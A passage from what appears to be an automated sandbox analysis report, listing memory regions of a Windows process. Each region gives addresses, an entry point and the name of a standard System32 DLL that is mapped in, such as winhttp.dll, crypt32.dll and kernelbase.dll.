end_va = 0x7ffa0afd1fff monitored = 0 entry_point = 0x7ffa0afc3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 933 start_va = 0x7ffa0b050000 end_va = 0x7ffa0b06afff monitored = 0 entry_point = 0x7ffa0b051040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 934 start_va = 0x7ffa0b300000 end_va = 0x7ffa0b314fff monitored = 0 entry_point = 0x7ffa0b302dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 935 start_va = 0x7ffa0b320000 end_va = 0x7ffa0b32dfff monitored = 0 entry_point = 0x7ffa0b321460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 936 start_va = 0x7ffa0b330000 end_va = 0x7ffa0b33bfff monitored = 0 entry_point = 0x7ffa0b332830 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 937 start_va = 0x7ffa0b340000 end_va = 0x7ffa0b34ffff monitored = 0 entry_point = 0x7ffa0b341700 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 938 start_va = 0x7ffa0b350000 end_va = 0x7ffa0b358fff monitored = 0 entry_point = 0x7ffa0b351ed0 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 939 start_va = 0x7ffa0b360000 end_va = 0x7ffa0b38cfff monitored = 0 entry_point = 0x7ffa0b362290 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 940 start_va = 0x7ffa0b390000 end_va = 0x7ffa0b3e1fff monitored = 0 entry_point = 0x7ffa0b3938e0 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 941 start_va = 0x7ffa0b4a0000 end_va = 0x7ffa0b4b4fff monitored = 0 entry_point = 0x7ffa0b4a3460 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 942 start_va = 0x7ffa0b4c0000 end_va = 0x7ffa0b559fff monitored = 0 entry_point = 0x7ffa0b4dada0 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 943 start_va = 0x7ffa0b640000 end_va = 0x7ffa0b6a6fff monitored = 0 entry_point = 0x7ffa0b6463e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 944 start_va = 0x7ffa0b7a0000 end_va = 0x7ffa0b7aafff monitored = 0 entry_point = 0x7ffa0b7a1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 945 start_va = 0x7ffa0b800000 end_va = 0x7ffa0b8bffff monitored = 0 entry_point = 0x7ffa0b82fd20 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 946 start_va = 0x7ffa0b9f0000 end_va = 0x7ffa0ba09fff monitored = 0 entry_point = 0x7ffa0b9f2430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 947 start_va = 0x7ffa0ba10000 end_va = 0x7ffa0ba25fff monitored = 0 entry_point = 0x7ffa0ba119f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 948 start_va = 0x7ffa0baf0000 end_va = 0x7ffa0bb27fff monitored = 0 entry_point = 0x7ffa0bb08cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 949 start_va = 0x7ffa0bbe0000 end_va = 0x7ffa0bc8dfff monitored = 0 entry_point = 0x7ffa0bbf80c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 950 start_va = 0x7ffa0bc90000 end_va = 0x7ffa0bca1fff monitored = 0 entry_point = 0x7ffa0bc99260 region_type = mapped_file name = "rilproxy.dll" filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll") Region: id = 951 start_va = 0x7ffa0bcb0000 end_va = 0x7ffa0bd60fff monitored = 0 entry_point = 0x7ffa0bd288b0 region_type = mapped_file name = "cellularapi.dll" filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll") Region: id = 952 start_va = 0x7ffa0bd70000 end_va = 0x7ffa0bd83fff monitored = 0 entry_point = 0x7ffa0bd72d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 953 start_va = 0x7ffa0c070000 end_va = 0x7ffa0c102fff monitored = 0 entry_point = 0x7ffa0c079680 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 954 start_va = 0x7ffa0c2b0000 end_va = 0x7ffa0c2d4fff monitored = 0 entry_point = 0x7ffa0c2c2f20 region_type = mapped_file name = "wificonnapi.dll" filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll") Region: id = 955 start_va = 0x7ffa0c2e0000 end_va = 0x7ffa0c2f0fff monitored = 0 entry_point = 0x7ffa0c2e7ea0 region_type = mapped_file name = "dcpapi.dll" filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll") Region: id = 956 start_va = 0x7ffa0c300000 end_va = 0x7ffa0c318fff monitored = 0 entry_point = 0x7ffa0c304520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 957 start_va = 0x7ffa0ca80000 end_va = 0x7ffa0ca99fff monitored = 0 entry_point = 0x7ffa0ca82cf0 region_type = mapped_file name = "locationpelegacywinlocation.dll" filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll") Region: id = 958 start_va = 0x7ffa0ce40000 end_va = 0x7ffa0d1c1fff monitored = 0 entry_point = 0x7ffa0ce91220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 959 start_va = 0x7ffa0e2c0000 end_va = 0x7ffa0e3cdfff monitored = 0 entry_point = 0x7ffa0e30eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 960 start_va = 0x7ffa0e6d0000 end_va = 0x7ffa0e724fff monitored = 0 entry_point = 0x7ffa0e6d3fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 961 start_va = 0x7ffa0e730000 end_va = 0x7ffa0e766fff monitored = 0 entry_point = 0x7ffa0e736020 region_type = mapped_file name = "gnssadapter.dll" filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll") Region: id = 962 start_va = 0x7ffa0e770000 end_va = 0x7ffa0e78ffff monitored = 0 entry_point = 0x7ffa0e7739a0 region_type = mapped_file name = "locationwinpalmisc.dll" filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll") Region: id = 963 start_va = 0x7ffa0e790000 end_va = 0x7ffa0e7a6fff monitored = 0 entry_point = 0x7ffa0e795630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 964 start_va = 0x7ffa0e7b0000 end_va = 0x7ffa0e7c2fff monitored = 0 entry_point = 0x7ffa0e7b57f0 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 965 start_va = 0x7ffa0e7d0000 end_va = 0x7ffa0e849fff monitored = 0 entry_point = 0x7ffa0e7f7630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 966 start_va = 0x7ffa0e850000 end_va = 0x7ffa0e87dfff monitored = 0 entry_point = 0x7ffa0e857550 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 967 start_va = 0x7ffa0e880000 end_va = 0x7ffa0e895fff monitored = 0 entry_point = 0x7ffa0e881b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 968 start_va = 0x7ffa0e8a0000 end_va = 0x7ffa0e903fff monitored = 0 entry_point = 0x7ffa0e8b5ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 969 start_va = 0x7ffa0ead0000 end_va = 0x7ffa0eb10fff monitored = 0 entry_point = 0x7ffa0ead4840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 970 start_va = 0x7ffa0eb20000 end_va = 0x7ffa0eb2bfff monitored = 0 entry_point = 0x7ffa0eb214d0 region_type = mapped_file name = "locationframeworkps.dll" filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll") Region: id = 971 start_va = 0x7ffa0eb30000 end_va = 0x7ffa0ec65fff monitored = 0 entry_point = 0x7ffa0eb5f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 972 start_va = 0x7ffa0ec70000 end_va = 0x7ffa0ed55fff monitored = 0 entry_point = 0x7ffa0ec8cf10 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 973 start_va = 0x7ffa0ed60000 end_va = 0x7ffa0ee27fff monitored = 0 entry_point = 0x7ffa0eda13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 974 start_va = 0x7ffa0ee30000 end_va = 0x7ffa0ee90fff monitored = 0 entry_point = 0x7ffa0ee34b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 975 start_va = 0x7ffa0eea0000 end_va = 0x7ffa0f01bfff monitored = 0 entry_point = 0x7ffa0eef1650 region_type = mapped_file name = "locationframework.dll" filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll") Region: id = 976 start_va = 0x7ffa0f020000 end_va = 0x7ffa0f02afff monitored = 0 entry_point = 0x7ffa0f021770 region_type = mapped_file name = "lfsvc.dll" filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll") Region: id = 977 start_va = 0x7ffa0f030000 end_va = 0x7ffa0f06dfff monitored = 0 entry_point = 0x7ffa0f03a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 978 start_va = 0x7ffa0f070000 end_va = 0x7ffa0f096fff monitored = 0 entry_point = 0x7ffa0f073bf0 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 979 start_va = 0x7ffa0f0a0000 end_va = 0x7ffa0f0e9fff monitored = 0 entry_point = 0x7ffa0f0aac30 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 980 start_va = 0x7ffa0f0f0000 end_va = 0x7ffa0f144fff monitored = 0 entry_point = 0x7ffa0f0ffc00 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 981 start_va = 0x7ffa0f190000 end_va = 0x7ffa0f221fff monitored = 0 entry_point = 0x7ffa0f1da780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 982 start_va = 0x7ffa0f2b0000 end_va = 0x7ffa0f2bcfff monitored = 0 entry_point = 0x7ffa0f2b1420 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 983 start_va = 0x7ffa0f2d0000 end_va = 0x7ffa0f2dffff monitored = 0 entry_point = 0x7ffa0f2d2c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 984 start_va = 0x7ffa0f2e0000 end_va = 0x7ffa0f2ecfff monitored = 0 entry_point = 0x7ffa0f2e2ca0 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 985 start_va = 0x7ffa0f2f0000 end_va = 0x7ffa0f31efff monitored = 0 entry_point = 0x7ffa0f2f8910 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 986 start_va = 0x7ffa0f320000 end_va = 0x7ffa0f33efff monitored = 0 entry_point = 0x7ffa0f324960 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 987 start_va = 0x7ffa0f370000 end_va = 0x7ffa0f3ddfff monitored = 0 entry_point = 0x7ffa0f377f60 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 988 start_va = 0x7ffa0f3e0000 end_va = 0x7ffa0f3f0fff monitored = 0 entry_point = 0x7ffa0f3e3320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 989 start_va = 0x7ffa0f430000 end_va = 0x7ffa0f465fff monitored = 0 entry_point = 0x7ffa0f440070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 990 start_va = 0x7ffa0fc30000 end_va = 0x7ffa0fc70fff monitored = 0 entry_point = 0x7ffa0fc47eb0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 991 start_va = 0x7ffa0fc80000 end_va = 0x7ffa0fd7bfff monitored = 0 entry_point = 0x7ffa0fcb6df0 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 992 start_va = 0x7ffa0fe10000 end_va = 0x7ffa0fecefff monitored = 0 entry_point = 0x7ffa0fe31c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 993 start_va = 0x7ffa0ff20000 end_va = 0x7ffa0ff29fff monitored = 0 entry_point = 0x7ffa0ff21660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 994 start_va = 0x7ffa0ff30000 end_va = 0x7ffa0ff47fff monitored = 0 entry_point = 0x7ffa0ff35910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 995 start_va = 0x7ffa0ff50000 end_va = 0x7ffa1009cfff monitored = 0 entry_point = 0x7ffa0ff93da0 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 996 start_va = 0x7ffa10cc0000 end_va = 0x7ffa11152fff monitored = 0 entry_point = 0x7ffa10ccf760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 997 start_va = 0x7ffa11160000 end_va = 0x7ffa111c6fff monitored = 0 entry_point = 0x7ffa1117e710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 998 start_va = 0x7ffa11220000 end_va = 0x7ffa113a5fff monitored = 0 entry_point = 0x7ffa1126d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 999 start_va = 0x7ffa113b0000 end_va = 0x7ffa113cbfff monitored = 0 entry_point = 0x7ffa113b37a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1000 start_va = 0x7ffa113d0000 end_va = 0x7ffa113dafff monitored = 0 entry_point = 0x7ffa113d1de0 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 1001 start_va = 0x7ffa11410000 end_va = 0x7ffa11422fff monitored = 0 entry_point = 0x7ffa11412760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1002 start_va = 0x7ffa114c0000 end_va = 0x7ffa114c9fff monitored = 0 entry_point = 0x7ffa114c1350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1003 start_va = 0x7ffa11600000 end_va = 0x7ffa11607fff monitored = 0 entry_point = 0x7ffa116013e0 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 1004 start_va = 0x7ffa11640000 end_va = 0x7ffa1167ffff monitored = 0 entry_point = 0x7ffa11651960 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 1005 start_va = 0x7ffa117d0000 end_va = 0x7ffa117f6fff monitored = 0 entry_point = 0x7ffa117d7940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1006 start_va = 0x7ffa11800000 end_va = 0x7ffa118a9fff monitored = 0 entry_point = 0x7ffa11827910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1007 start_va = 0x7ffa118b0000 end_va = 0x7ffa119affff monitored = 0 entry_point = 0x7ffa118f0f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 1008 start_va = 0x7ffa11a40000 end_va = 0x7ffa11a4bfff monitored = 0 entry_point = 0x7ffa11a42480 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 1009 start_va = 0x7ffa11b10000 end_va = 0x7ffa11b41fff monitored = 0 entry_point = 0x7ffa11b22340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 1010 start_va = 0x7ffa11d80000 end_va = 0x7ffa11d8bfff monitored = 0 entry_point = 0x7ffa11d82790 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 1011 start_va = 0x7ffa11d90000 end_va = 0x7ffa11db3fff monitored = 0 entry_point = 0x7ffa11d93260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1012 start_va = 0x7ffa11f30000 end_va = 0x7ffa12023fff monitored = 0 entry_point = 0x7ffa11f3a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1013 start_va = 0x7ffa12080000 end_va = 0x7ffa120c8fff monitored = 0 entry_point = 0x7ffa1208a090 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1014 start_va = 0x7ffa121a0000 end_va = 0x7ffa121abfff monitored = 0 entry_point = 0x7ffa121a27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1015 start_va = 0x7ffa12280000 end_va = 0x7ffa122b0fff monitored = 0 entry_point = 0x7ffa12287d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1016 start_va = 0x7ffa122e0000 end_va = 0x7ffa12359fff monitored = 0 entry_point = 0x7ffa12301a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1017 start_va = 0x7ffa123a0000 end_va = 0x7ffa123d3fff monitored = 0 entry_point = 0x7ffa123bae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1018 start_va = 0x7ffa123e0000 end_va = 0x7ffa123e9fff monitored = 0 entry_point = 0x7ffa123e1830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 1019 start_va = 0x7ffa124f0000 end_va = 0x7ffa1250efff monitored = 0 entry_point = 0x7ffa124f5d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1020 start_va = 0x7ffa12660000 end_va = 0x7ffa126bbfff monitored = 0 entry_point = 0x7ffa12676f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1021 start_va = 0x7ffa12710000 end_va = 0x7ffa12726fff monitored = 0 entry_point = 0x7ffa127179d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1022 start_va = 0x7ffa12830000 end_va = 0x7ffa1283afff monitored = 0 entry_point = 0x7ffa128319a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1023 start_va = 0x7ffa12870000 end_va = 0x7ffa12890fff monitored = 0 entry_point = 0x7ffa12880250 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 1024 start_va = 0x7ffa128c0000 end_va = 0x7ffa128f9fff monitored = 0 entry_point = 0x7ffa128c8d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1025 start_va = 0x7ffa12900000 end_va = 0x7ffa12926fff monitored = 0 entry_point = 0x7ffa12910aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1026 start_va = 0x7ffa12a10000 end_va = 0x7ffa12a3cfff monitored = 0 entry_point = 0x7ffa12a29d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1027 start_va = 0x7ffa12ba0000 end_va = 0x7ffa12bf5fff monitored = 0 entry_point = 0x7ffa12bb0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1028 start_va = 0x7ffa12c00000 end_va = 0x7ffa12c18fff monitored = 0 entry_point = 0x7ffa12c05e10 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 1029 start_va = 0x7ffa12c20000 end_va = 0x7ffa12c48fff monitored = 0 entry_point = 0x7ffa12c34530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1030 start_va = 0x7ffa12c50000 end_va = 0x7ffa12ce8fff monitored = 0 entry_point = 0x7ffa12c7f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1031 start_va = 0x7ffa12d90000 end_va = 0x7ffa12da3fff monitored = 0 entry_point = 0x7ffa12d952e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1032 start_va = 0x7ffa12db0000 end_va = 0x7ffa12dbffff monitored = 0 entry_point = 0x7ffa12db56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1033 start_va = 0x7ffa12dc0000 end_va = 0x7ffa12e0afff monitored = 0 entry_point = 0x7ffa12dc35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1034 start_va = 0x7ffa12e10000 end_va = 0x7ffa12e1efff monitored = 0 entry_point = 0x7ffa12e13210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1035 start_va = 0x7ffa12e20000 end_va = 0x7ffa12e74fff monitored = 0 entry_point = 0x7ffa12e37970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1036 start_va = 0x7ffa12e80000 end_va = 0x7ffa12f34fff monitored = 0 entry_point = 0x7ffa12ec22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1037 start_va = 0x7ffa12f40000 end_va = 0x7ffa13106fff monitored = 0 entry_point = 0x7ffa12f9db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1038 start_va = 0x7ffa13110000 end_va = 0x7ffa13126fff monitored = 0 entry_point = 0x7ffa13111390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1039 start_va = 0x7ffa13130000 end_va = 0x7ffa13317fff monitored = 0 entry_point = 0x7ffa1315ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1040 start_va = 0x7ffa13320000 end_va = 0x7ffa13389fff monitored = 0 